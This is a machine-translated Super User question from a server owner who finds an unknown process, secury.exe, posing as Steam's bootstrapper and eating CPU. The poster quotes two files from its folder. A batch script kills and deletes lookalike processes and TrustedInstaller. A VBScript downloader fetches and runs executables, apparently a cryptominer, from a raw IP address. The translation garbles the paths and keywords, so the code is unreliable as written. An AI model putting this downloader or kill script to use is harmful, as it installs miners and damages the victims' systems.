windows - jak trwale zabić bootstrapper klienta pary - Super User
W moim menedżerze zadań mam następującą sytuację:
Nie wiem, jaka to aplikacja, ale zdecydowanie nie jest to program ładujący klienta Steam, ponieważ go nie zainstalowałem i nie mogę go odinstalować.
Widzę coś takiego:
W narzędziu MS Config nie znalazłem niczego, co wygląda jak secury.exe.
Gdy otwieram lokalizację pliku, widzę trzy pliki:
m.bat, b.exe, 4.vbs.
Poniżej znajduje się zawartość m.bat:
taskkill / f / t / im secury.exe c: Program dataury taskkill / f / t / im kingsoft.exe taskkill / f / t / im expl0rer.exe taskkill / f / t / im ieplare.exev taskkill / f / t / im nssm.exe taskkill / f / t / im MSASCui.exe taskkill / f / t / im SystemSettlngs.exe taskkill / f / t / im SystemSetting.exe taskkill / f / t / im Process.exe taskkill / f / t / im winlnlt.exe taskkill / f / t / im WindowsUpgrade.exe taskkill / f / t / im msdc.exe taskkill / f / t / im Fiddlere.exe taskkill / f / t / im shovst.exe taskkill / f / t / im lqrtqe.exe taskkill / f / t / im apkls.exe taskkill / f / t / im winlog.exe taskkill / f / t / im svchosts.exe taskkill / f / t / im win1ogins.exe taskkill / f / t / im shovsts.exe taskkill / f / t / im fcty.exe taskkill / f / t / im soiuos.exe taskkill / f / t / im TrustedInstaller.exe del C: Windows System32 C: Instalator systemu Windows TrustedInstaller.exe del C: Dane programu Kingsoft.exe del C: Dane programu er0rer.exe del C: Dane programu esplare.exe del C: Dane programu nssm.exe del C: ProgramData MSASCui.exe del C: Pro gramData SystemSettlngs.exe del C: Dane programu System.exe del C: Dane programu Proces.exe del C: Dane programu llnlt.exe del C: Dane programu WindowsUpgrade.exe del C: Dane programu msdc.exe del C: Dane programuiddlere.exe del C: Dane instalacyjne.exe del C: Dane programowe qrtqe.exe del C: Dane programowe clkls.exe del C: Dane logowania log.exe del C: Dane programu svchosts.exe del C: Dane programu win1ogins.exe del C: Dane pliku.exe.exe C: Dane programu cty.exe del C: Dane pliku.exe.exe C: Dane pliku 2.exe del C: ProgramData3.exe
Następny idzie 4.vbs:
Ustaw xPost = CreateObject („Microsoft.XMLHTTP”) xPost.Open „GET”, „http://223.68.209.7:65510/2.exe”, 0 xPost.Send () Set sGet = CreateObject („ADODB.Stream” ) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: ProgramData s2.exe", 2 Set xPost = CreateObject ("Microsoft.XMLHTTP") xPost.Open „GET”, „http://223.68.209.7:65510/pool.exe”, 0 xPost.Send () Set sGet = CreateObject („ADODB.Stream”) sGet.Mode = 3 sGet.Type = 1 sGet.Open () sGet.Write (xPost.responseBody) sGet.SaveToFile "c: ProgramData pool2.exe", 2 CreateObject ("WScript.Shell"). Uruchom "C: ProgramData3.exe" CreateObject ( „WScript.Shell”). Uruchom „del C: ProgramData3.exe”
Co mogę zrobić, aby powstrzymać secury.exe przed nadużywaniem mocy obliczeniowych mojego serwera?
PS Wykonałem pełny test Avasta na moim komputerze, ale nie znalazł nic złego.
Exe przed nadużywaniem mocy obliczeniowych mojego serwera?